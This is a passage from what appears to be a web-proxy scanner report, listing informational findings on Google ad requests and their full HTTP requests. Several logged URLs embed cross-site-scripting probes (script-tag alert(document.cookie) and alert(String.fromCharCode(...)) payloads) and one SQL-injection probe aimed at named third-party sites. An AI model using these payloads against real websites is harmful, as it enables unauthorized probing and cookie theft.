Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.50. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924683&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903083872&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903083899&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1035376581&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=1076&xpc=wUl4gWBxBH&p=http%3A//www.masjo.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DOnline%2B%2526amp%253B%2BCampus%2BPrograms%26adU%3Dwww.CustomTyping.com%26adT%3DPractice%2BTyping%2BLessons%26adU%3Dwww.Groupon.com/Washington-DC%26adT%3DWashington%2BDC%2BCoupons%26gl%3DUS&usg=AFQjCNFsc7Pv2bBle50SghEXhjfQziXIIg

Request

GET /pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924683&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903083872&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903083899&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1035376581&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=1076&xpc=wUl4gWBxBH&p=http%3A//www.masjo.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.51. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917071353&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917071355&frm=0&adk=1607234649&ga_vid=1939593495.1295917071&ga_sid=1295917071&ga_hid=850741405&ga_fc=0&u_tz=-360&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143103&fu=0&ifi=1&dtd=5&xpc=Wgz9jL9BqY&p=http%3A//cdn.cloudscan.us

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DEventsManager.GFI.Com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF5ixiUSpJykWD3ZaQXppT4xjGl7A

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917071353&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917071355&frm=0&adk=1607234649&ga_vid=1939593495.1295917071&ga_sid=1295917071&ga_hid=850741405&ga_fc=0&u_tz=-360&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143103&fu=0&ifi=1&dtd=5&xpc=Wgz9jL9BqY&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.52. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070447&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885070450&frm=0&adk=3874739809&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=1&dtd=6&xpc=hahEPtcWb5&p=http%3A//www25.big.jp

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGmjpkoAOkmlcVrh6X3j9cRryeHrw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070447&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885070450&frm=0&adk=3874739809&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=1&dtd=6&xpc=hahEPtcWb5&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.53. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916269&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=11&xpc=R7J9Q2zfmY&p=http%3A//www.x64bitdownload.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.Centrify.com/Express%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFMtKFw4ua7YenW7qINtzEn3r4Mwg

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916269&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=11&xpc=R7J9Q2zfmY&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.54. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021527&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885021553&frm=0&adk=3874739809&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=280&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3DTVneto.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHktkcN_kAgpKjC7M0HmIZ5_427VA

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021527&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885021553&frm=0&adk=3874739809&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=280&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.55. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=250&slotname=1941239499&w=300&lmt=1295935779&flash=10.1.103&url=http%3A%2F%2Fwww.soundingsonline.com%2F%3F1'%3D1&dt=1295922236612&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922236685&frm=0&adk=409666081&ga_vid=1723068183.1295922238&ga_sid=1295922238&ga_hid=386599552&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F59&fu=0&ifi=1&dtd=3003&xpc=TtWmgIhXxC&p=http%3A//www.soundingsonline.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/%253F1%2527%253D1%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3DPhoenix.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFIk5F3IGtYkLKikLy13yVNnljZZg

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=250&slotname=1941239499&w=300&lmt=1295935779&flash=10.1.103&url=http%3A%2F%2Fwww.soundingsonline.com%2F%3F1'%3D1&dt=1295922236612&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922236685&frm=0&adk=409666081&ga_vid=1723068183.1295922238&ga_sid=1295922238&ga_hid=386599552&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F59&fu=0&ifi=1&dtd=3003&xpc=TtWmgIhXxC&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.56. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.Google.com/ig%26adT%3DOnline%2BThesaurus%26adU%3DYahoo.com%26adT%3DAbbreviations%26gl%3DUS&usg=AFQjCNGS5DKvtrnDzDUAr3_NuVakjNR9sQ

Request

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.57. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.Centrify.com/Linux%26adT%3DLinux%2BActive%2BDirectory%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3Dcncwindowandglass.com%26adT%3DC%2526amp%253BC%2BWindow,Glass%2B%2526amp%253BMirror%26gl%3DUS&usg=AFQjCNHdW_Jd5uLpURqGV9yPEl8pxGo3AQ

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.58. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021810&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885021553&frm=0&adk=2318622855&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=14&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.ballerarcade.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF3Mc_FOpmnu196_F7ihnQiTxqRcw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021810&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885021553&frm=0&adk=2318622855&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=14&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.59. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

